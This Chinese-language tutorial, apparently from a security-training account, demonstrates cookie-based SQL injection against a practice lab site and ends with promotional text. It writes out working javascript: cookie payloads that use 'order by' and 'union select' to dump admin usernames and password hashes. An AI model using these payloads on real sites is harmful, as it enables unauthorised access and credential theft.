經過了我們前段時間的sql注入學習,今天我們來深入學習一下sql注入之cookie注入
首先我們打開靶場環境
隨便點開一篇文章
嘗試在結尾構造一下 and 1=1
可見是使用了防注入的,但是目前我們是使用get方式提交的參數,我們將id=171包括后面的全部刪除一下試試
顯示數據庫出錯
這里存在cookie注入,首先我們恢復成原來的界面
然后我們下載一個ModHeader瀏覽器插件,將cookie設置為id的值。然后我們訪問
其去掉后面?id的網頁,發現并沒有顯示數據庫出錯了
然后將IE欄清空,輸入
JAVAscript:alert(document.cookie="id="+escape("171"));
這個語句就是構造一個JS,把內容插入到cookie里面去
返回出一個id=171
然后我們來手工注入一下他的字段數
JavaScript:alert(document.cookie="id="+escape("171 order by 10"));
可以知道他有10個字段數
然后我們里顯示他的值
javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));
再刷新一遍發現顯示2,3
然后我們來破解賬號和密碼
javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));
得出來MD5加密后密碼,解密后welcome,然后就可以登錄后臺了。
最后喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:加群。(送免費資料和優惠券)
就會自動分享給你群號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和愿景,讓我們共同成為守護信息世界的"SaFeMAN"。
還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券!
